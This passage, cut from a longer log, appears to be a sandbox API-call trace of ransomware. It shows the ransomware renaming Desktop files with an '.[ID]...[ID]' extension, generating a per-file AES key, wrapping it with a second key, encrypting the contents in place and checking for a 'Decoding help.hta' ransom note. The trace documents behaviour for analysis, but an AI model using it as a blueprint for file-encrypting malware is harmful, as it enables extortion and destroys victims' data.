phProv=0x51cfcec*=0x3449138) returned 1 [0043.579] CryptGenKey (in: hProv=0x3449138, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5d7f10) returned 1 [0043.579] CryptExportKey (in: hKey=0x5d7f10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.579] MapViewOfFile (hFileMappingObject=0x398, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16720) returned 0x4910000 [0043.581] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.581] CryptEncrypt (in: hKey=0x5d7f10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4910000, pdwDataLen=0x51cfce4*=0x16720, dwBufLen=0x16720 | out: pbData=0x4910000*, pdwDataLen=0x51cfce4*=0x16720) returned 1 [0043.582] UnmapViewOfFile (lpBaseAddress=0x4910000) returned 1 [0043.584] CloseHandle (hObject=0x398) returned 1 [0043.585] CryptDestroyKey (hKey=0x5d7f10) returned 1 [0043.585] CryptReleaseContext (hProv=0x3449138, dwFlags=0x0) returned 1 [0043.585] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.585] WriteFile (in: hFile=0x388, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.585] WriteFile (in: hFile=0x388, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.586] CloseHandle (hObject=0x388) returned 1 [0043.587] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.588] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f9a1910, ftCreationTime.dwHighDateTime=0x1d4c5cf, ftLastAccessTime.dwLowDateTime=0xc7a23780, ftLastAccessTime.dwHighDateTime=0x1d4c821, ftLastWriteTime.dwLowDateTime=0xc7a23780, ftLastWriteTime.dwHighDateTime=0x1d4c821, nFileSizeHigh=0x0, nFileSizeLow=0xff36, dwReserved0=0x0, dwReserved1=0x0, cFileName="2IEj-Bprh3fH12Sk7.odt", cAlternateFileName="2IEJ-B~1.ODT")) returned 1 [0043.588] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.588] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.588] lstrcmpiW (lpString1="Decoding help.hta", lpString2="2IEj-Bprh3fH12Sk7.odt") returned 1 [0043.588] lstrlenW (lpString="2IEj-Bprh3fH12Sk7.odt") returned 21 [0043.588] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.588] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="2IEj-Bprh3fH12Sk7.odt" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt" [0043.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt" [0043.589] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt.[ID]g9uZrLhJaygpwRm1[ID]" [0043.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2iej-bprh3fh12sk7.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2iej-bprh3fh12sk7.odt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2iej-bprh3fh12sk7.odt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0043.590] CreateFileMappingA (hFile=0x388, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x398 [0043.590] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x3449138) returned 1 [0043.591] CryptGenKey (in: hProv=0x3449138, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671df0) returned 1 [0043.591] CryptExportKey (in: hKey=0x671df0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.591] MapViewOfFile (hFileMappingObject=0x398, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xff20) returned 0x44a0000 [0043.593] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.593] CryptEncrypt (in: hKey=0x671df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44a0000, pdwDataLen=0x51cfce4*=0xff20, dwBufLen=0xff20 | out: pbData=0x44a0000*, pdwDataLen=0x51cfce4*=0xff20) returned 1 [0043.594] UnmapViewOfFile (lpBaseAddress=0x44a0000) returned 1 [0043.596] CloseHandle (hObject=0x398) returned 1 [0043.596] CryptDestroyKey (hKey=0x671df0) returned 1 [0043.596] CryptReleaseContext (hProv=0x3449138, dwFlags=0x0) returned 1 [0043.596] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.596] WriteFile (in: hFile=0x388, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.597] WriteFile (in: hFile=0x388, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.597] CloseHandle (hObject=0x388) returned 1 [0043.598] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2IEj-Bprh3fH12Sk7.odt.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.599] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9f86b0, ftCreationTime.dwHighDateTime=0x1d4c638, ftLastAccessTime.dwLowDateTime=0x4835dea0, ftLastAccessTime.dwHighDateTime=0x1d4cc10, ftLastWriteTime.dwLowDateTime=0x4835dea0, ftLastWriteTime.dwHighDateTime=0x1d4cc10, nFileSizeHigh=0x0, nFileSizeLow=0x45f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="54a SlEUM.m4a", cAlternateFileName="54ASLE~1.M4A")) returned 1 [0043.599] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.599] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.599] lstrcmpiW (lpString1="Decoding help.hta", lpString2="54a SlEUM.m4a") returned 1 [0043.599] lstrlenW (lpString="54a SlEUM.m4a") returned 13 [0043.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.599] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="54a SlEUM.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a" [0043.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a" [0043.599] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a.[ID]g9uZrLhJaygpwRm1[ID]" [0043.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\54a sleum.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\54a sleum.m4a.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\54a sleum.m4a.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0043.601] CreateFileMappingA (hFile=0x388, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x398 [0043.601] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x3449138) returned 1 [0043.602] CryptGenKey (in: hProv=0x3449138, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671db0) returned 1 [0043.602] CryptExportKey (in: hKey=0x671db0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.602] MapViewOfFile (hFileMappingObject=0x398, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45e0) returned 0x44a0000 [0043.603] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.603] CryptEncrypt (in: hKey=0x671db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44a0000*, pdwDataLen=0x51cfce4*=0x45e0, dwBufLen=0x45e0 | out: pbData=0x44a0000*, pdwDataLen=0x51cfce4*=0x45e0) returned 1 [0043.604] UnmapViewOfFile (lpBaseAddress=0x44a0000) returned 1 [0043.605] CloseHandle (hObject=0x398) returned 1 [0043.605] CryptDestroyKey (hKey=0x671db0) returned 1 [0043.605] CryptReleaseContext (hProv=0x3449138, dwFlags=0x0) returned 1 [0043.605] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.605] WriteFile (in: hFile=0x388, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.606] WriteFile (in: hFile=0x388, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.607] CloseHandle (hObject=0x388) returned 1 [0043.608] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\54a SlEUM.m4a.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.608] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128ec6e0, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xb5b9d900, ftLastAccessTime.dwHighDateTime=0x1d4cc9b, ftLastWriteTime.dwLowDateTime=0xb5b9d900, ftLastWriteTime.dwHighDateTime=0x1d4cc9b, nFileSizeHigh=0x0, nFileSizeLow=0x12a92, dwReserved0=0x0, dwReserved1=0x0, cFileName="8i8Xn UZ7.jpg", cAlternateFileName="8I8XNU~1.JPG")) returned 1 [0043.608] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.608] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.609] lstrcmpiW (lpString1="Decoding help.hta", lpString2="8i8Xn UZ7.jpg") returned 1 [0043.609] lstrlenW (lpString="8i8Xn UZ7.jpg") returned 13 [0043.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="8i8Xn UZ7.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg" [0043.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg" [0043.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0043.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8i8xn uz7.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8i8xn uz7.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8i8xn uz7.jpg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0043.610] CreateFileMappingA (hFile=0x388, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x398 [0043.610] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x3449138) returned 1 [0043.611] CryptGenKey (in: hProv=0x3449138, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671df0) returned 1 [0043.611] CryptExportKey (in: hKey=0x671df0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.611] MapViewOfFile (hFileMappingObject=0x398, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a80) returned 0x4910000 [0043.613] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.613] CryptEncrypt (in: hKey=0x671df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4910000, pdwDataLen=0x51cfce4*=0x12a80, dwBufLen=0x12a80 | out: pbData=0x4910000*, pdwDataLen=0x51cfce4*=0x12a80) returned 1 [0043.615] UnmapViewOfFile (lpBaseAddress=0x4910000) returned 1 [0043.616] CloseHandle (hObject=0x398) returned 1 [0043.616] CryptDestroyKey (hKey=0x671df0) returned 1 [0043.616] CryptReleaseContext (hProv=0x3449138, dwFlags=0x0) returned 1 [0043.616] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.616] WriteFile (in: hFile=0x388, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.616] WriteFile (in: hFile=0x388, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.617] CloseHandle (hObject=0x388) returned 1 [0043.635] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8i8Xn UZ7.jpg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.635] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e095390, ftCreationTime.dwHighDateTime=0x1d4cd34, ftLastAccessTime.dwLowDateTime=0xa95068f0, ftLastAccessTime.dwHighDateTime=0x1d4d074, ftLastWriteTime.dwLowDateTime=0xa95068f0, ftLastWriteTime.dwHighDateTime=0x1d4d074, nFileSizeHigh=0x0, nFileSizeLow=0x869b, dwReserved0=0x0, dwReserved1=0x0, cFileName="adEBzQ.avi", cAlternateFileName="")) returned 1 [0043.635] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.635] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.635] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adEBzQ.avi") returned 1 [0043.635] lstrlenW (lpString="adEBzQ.avi") returned 10 [0043.635] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.636] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="adEBzQ.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi" [0043.636] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi" [0043.636] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\adEBzQ.avi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS 